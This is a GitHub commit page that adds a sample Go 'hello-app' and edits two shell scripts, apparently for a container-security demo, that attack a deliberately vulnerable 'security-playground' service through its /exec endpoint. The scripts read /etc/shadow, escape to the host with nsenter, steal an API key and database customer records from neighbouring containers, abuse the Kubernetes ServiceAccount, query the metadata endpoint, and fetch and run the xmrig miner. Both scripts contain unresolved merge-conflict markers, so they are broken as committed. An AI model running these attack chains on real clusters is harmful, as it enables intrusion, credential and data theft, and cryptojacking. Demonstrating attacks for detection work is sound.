Skip to content

Commit ec4d8fb

Browse files
jasonumiker-sysdigjasonumiker-sysdig
committed
1 parent 34cecd4 commit ec4d8fb

File tree

10 files changed

+466
-3
lines changed

10 files changed

+466
-3
lines changed

docker-build-hello-app/Dockerfile

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
# Copyright 2022 Google LLC
2+
#
3+
# Licensed under the Apache License, Version 2.0 (the "License");
4+
# you may not use this file except in compliance with the License.
5+
# You may obtain a copy of the License at
6+
#
7+
# http://www.apache.org/licenses/LICENSE-2.0
8+
#
9+
# Unless required by applicable law or agreed to in writing, software
10+
# distributed under the License is distributed on an "AS IS" BASIS,
11+
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12+
# See the License for the specific language governing permissions and
13+
# limitations under the License.
14+
15+
FROM golang:1.20.4 as builder
16+
WORKDIR /app
17+
RUN go mod init hello-app
18+
COPY *.go ./
19+
RUN CGO_ENABLED=0 GOOS=linux go build -o /hello-app
20+
21+
FROM gcr.io/distroless/base-debian11
22+
WORKDIR /
23+
COPY --from=builder /hello-app /hello-app
24+
ENV PORT 8080
25+
USER nonroot:nonroot
26+
CMD ["/hello-app"]

docker-build-hello-app/README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Cloned from https://github.com/GoogleCloudPlatform/kubernetes-engine-samples/tree/main/hello-app

docker-build-hello-app/build.sh

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
docker buildx create --name mybuilder --bootstrap --use
2+
docker buildx build --push \
3+
--platform linux/arm64,linux/amd64 \
4+
--tag jasonumiker/hello-app:190523 \
5+
.
6+
docker buildx build --push \
7+
--platform linux/arm64,linux/amd64 \
8+
--tag jasonumiker/hello-app:latest \
9+
.
10+
docker buildx rm mybuilder

docker-build-hello-app/main.go

Lines changed: 54 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,54 @@
1+
/**
2+
* Copyright 2021 Google Inc.
3+
*
4+
* Licensed under the Apache License, Version 2.0 (the "License");
5+
* you may not use this file except in compliance with the License.
6+
* You may obtain a copy of the License at
7+
*
8+
* http://www.apache.org/licenses/LICENSE-2.0
9+
*
10+
* Unless required by applicable law or agreed to in writing, software
11+
* distributed under the License is distributed on an "AS IS" BASIS,
12+
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13+
* See the License for the specific language governing permissions and
14+
* limitations under the License.
15+
*/
16+
17+
// [START gke_hello_app]
18+
// [START container_hello_app]
19+
package main
20+
21+
import (
22+
"fmt"
23+
"log"
24+
"net/http"
25+
"os"
26+
)
27+
28+
func main() {
29+
// register hello function to handle all requests
30+
mux := http.NewServeMux()
31+
mux.HandleFunc("/", hello)
32+
33+
// use PORT environment variable, or default to 8080
34+
port := os.Getenv("PORT")
35+
if port == "" {
36+
port = "8080"
37+
}
38+
39+
// start the web server on port and accept requests
40+
log.Printf("Server listening on port %s", port)
41+
log.Fatal(http.ListenAndServe(":"+port, mux))
42+
}
43+
44+
// hello responds to the request with a plain-text "Hello, world" message.
45+
func hello(w http.ResponseWriter, r *http.Request) {
46+
log.Printf("Serving request: %s", r.URL.Path)
47+
host, _ := os.Hostname()
48+
fmt.Fprintf(w, "Hello, world!\n")
49+
fmt.Fprintf(w, "Version: 1.0.0\n")
50+
fmt.Fprintf(w, "Hostname: %s\n", host)
51+
}
52+
53+
// [END container_hello_app]
54+
// [END gke_hello_app]

example-curls-nodrift.sh

Lines changed: 75 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,44 +1,118 @@
1-
#!/bin/bash
1+
#!/usr/bin/env bash
22
# Script to demonstrate how to interact with security-playground
33

44
NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
55
NODE_PORT=30002
6+
HELLO_NAMESPACE=hello
67

8+
<<<<<<< HEAD
9+
# Try to reach hello-server for our NetworkPolicy example later
10+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null
11+
12+
echo "1. Read a sensitive file (/etc/shadow)"
13+
echo "--------------------------------------------------------------------------------"
14+
=======
715
echo "1. Read a sensitive file (/etc/shadow)"
16+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
817
curl $NODE_IP:$NODE_PORT/etc/shadow
18+
echo "--------------------------------------------------------------------------------"
19+
sleep 10
20+
921

1022
echo "2. Exploit writing to /bin"
23+
echo "--------------------------------------------------------------------------------"
1124
curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"'
1225
echo ""
1326
echo "and then set it to be executable"
1427
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
1528
echo "and then run it"
1629
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
30+
echo "--------------------------------------------------------------------------------"
31+
sleep 10
1732

1833
echo "3. Install nmap from apt and then run a scan"
34+
<<<<<<< HEAD
35+
echo "--------------------------------------------------------------------------------"
36+
=======
37+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
1938
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
39+
echo "--------------------------------------------------------------------------------"
40+
sleep 10
2041

2142
echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
43+
<<<<<<< HEAD
44+
echo "--------------------------------------------------------------------------------"
45+
ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
46+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz"
47+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin"
48+
echo "--------------------------------------------------------------------------------"
49+
sleep 10
50+
51+
echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
52+
echo "--------------------------------------------------------------------------------"
53+
=======
2254
ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
2355
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
2456
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
2557

2658
echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
59+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
2760
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
61+
echo "--------------------------------------------------------------------------------"
62+
sleep 10
2863

64+
<<<<<<< HEAD
65+
echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)"
66+
echo "--------------------------------------------------------------------------------"
67+
HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q')
68+
HELLO_ID_1=`echo "${HELLO_ID}" | head -1`
69+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY
70+
echo "--------------------------------------------------------------------------------"
71+
sleep 10
72+
73+
echo "7. Exfil some data from another container running on the same Node"
74+
echo "--------------------------------------------------------------------------------"
75+
=======
2976
echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
3077
HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
3178
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
3279

3380
echo "7. Exfil some data from another container running on the same Node"
81+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
3482
POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
3583
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
84+
echo "--------------------------------------------------------------------------------"
85+
sleep 10
86+
87+
<<<<<<< HEAD
88+
echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount"
89+
echo "--------------------------------------------------------------------------------"
90+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl"
91+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
92+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723'
93+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
94+
echo "--------------------------------------------------------------------------------"
95+
sleep 10
3696

97+
echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container"
98+
echo "--------------------------------------------------------------------------------"
99+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info'
100+
echo "--------------------------------------------------------------------------------"
101+
sleep 10
102+
103+
echo "10. Download and run a common crypto miner (xmrig)"
104+
echo "--------------------------------------------------------------------------------"
105+
=======
37106
echo "8. Download and run a common crypto miner (xmrig)"
107+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
38108
if [[ "$ARCH" == "amd64" ]]; then
39109
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"
40110
else
41111
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"
42112
fi
43113
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
114+
<<<<<<< HEAD
115+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
116+
=======
44117
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
118+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7

example-curls-restricted.sh

Lines changed: 75 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,44 +1,118 @@
1-
#!/bin/bash
1+
#!/usr/bin/env bash
22
# Script to demonstrate how to interact with security-playground
33

44
NODE_IP=$(kubectl get nodes -o wide | awk 'FNR == 2 {print $6}')
55
NODE_PORT=30001
6+
HELLO_NAMESPACE=hello
67

8+
<<<<<<< HEAD
9+
# Try to reach hello-server for our NetworkPolicy example later
10+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl http://hello-server.$HELLO_NAMESPACE.svc:8080" > /dev/null
11+
12+
echo "1. Read a sensitive file (/etc/shadow)"
13+
echo "--------------------------------------------------------------------------------"
14+
=======
715
echo "1. Read a sensitive file (/etc/shadow)"
16+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
817
curl $NODE_IP:$NODE_PORT/etc/shadow
18+
echo "--------------------------------------------------------------------------------"
19+
sleep 10
20+
921

1022
echo "2. Exploit writing to /bin"
23+
echo "--------------------------------------------------------------------------------"
1124
curl -X POST $NODE_IP:$NODE_PORT/bin/hello -d 'content=echo "hello-world"'
1225
echo ""
1326
echo "and then set it to be executable"
1427
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 /bin/hello'
1528
echo "and then run it"
1629
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=hello'
30+
echo "--------------------------------------------------------------------------------"
31+
sleep 10
1732

1833
echo "3. Install nmap from apt and then run a scan"
34+
<<<<<<< HEAD
35+
echo "--------------------------------------------------------------------------------"
36+
=======
37+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
1938
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=apt-get update; apt-get -y install nmap;nmap -v scanme.nmap.org'
39+
echo "--------------------------------------------------------------------------------"
40+
sleep 10
2041

2142
echo "4. Break out of our Linux namespace to the host's with nsenter and install crictl in /usr/bin"
43+
<<<<<<< HEAD
44+
echo "--------------------------------------------------------------------------------"
45+
ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
46+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.27.1/crictl-v1.27.1-linux-$ARCH.tar.gz"
47+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.27.1-linux-$ARCH.tar.gz -C /usr/bin"
48+
echo "--------------------------------------------------------------------------------"
49+
sleep 10
50+
51+
echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
52+
echo "--------------------------------------------------------------------------------"
53+
=======
2254
ARCH=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture')
2355
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.26.1/crictl-v1.26.1-linux-$ARCH.tar.gz"
2456
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.26.1-linux-$ARCH.tar.gz -C /usr/bin"
2557

2658
echo "5. Break out of our Linux namespace to the host's with nsenter and talk directly to the container runtime"
59+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
2760
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps'
61+
echo "--------------------------------------------------------------------------------"
62+
sleep 10
2863

64+
<<<<<<< HEAD
65+
echo "6. Steal a secret from another container on the same Node (hello-client in the $HELLO_NAMESPACE Namespace)"
66+
echo "--------------------------------------------------------------------------------"
67+
HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client -q')
68+
HELLO_ID_1=`echo "${HELLO_ID}" | head -1`
69+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID_1 /bin/sh -c set" | grep API_KEY
70+
echo "--------------------------------------------------------------------------------"
71+
sleep 10
72+
73+
echo "7. Exfil some data from another container running on the same Node"
74+
echo "--------------------------------------------------------------------------------"
75+
=======
2976
echo "6. Steal a secret from another container on the same Node (hello-client-allowed in the team1 Namespace)"
3077
HELLO_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name hello-client-allowed -q')
3178
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $HELLO_ID /bin/sh -c set" | grep API_KEY
3279

3380
echo "7. Exfil some data from another container running on the same Node"
81+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
3482
POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
3583
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
84+
echo "--------------------------------------------------------------------------------"
85+
sleep 10
86+
87+
<<<<<<< HEAD
88+
echo "8. Call the Kubernetes API via security-playground's K8s ServiceAccount"
89+
echo "--------------------------------------------------------------------------------"
90+
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.27.1/2023-04-19/bin/linux/$ARCH/kubectl"
91+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
92+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:270723'
93+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
94+
echo "--------------------------------------------------------------------------------"
95+
sleep 10
3696

97+
echo "9. Call the Node's Instance Metadata Endpoint from the security-playground container"
98+
echo "--------------------------------------------------------------------------------"
99+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl curl http://169.254.169.254/latest/meta-data/iam/info'
100+
echo "--------------------------------------------------------------------------------"
101+
sleep 10
102+
103+
echo "10. Download and run a common crypto miner (xmrig)"
104+
echo "--------------------------------------------------------------------------------"
105+
=======
37106
echo "8. Download and run a common crypto miner (xmrig)"
107+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7
38108
if [[ "$ARCH" == "amd64" ]]; then
39109
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz"
40110
else
41111
curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz"
42112
fi
43113
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
114+
<<<<<<< HEAD
115+
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
116+
=======
44117
curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=xmrig-6.20.0/xmrig'
118+
>>>>>>> 34cecd4dc9f8ce5f5e1283f43884e70cd43effb7

0 commit comments

Comments
 (0)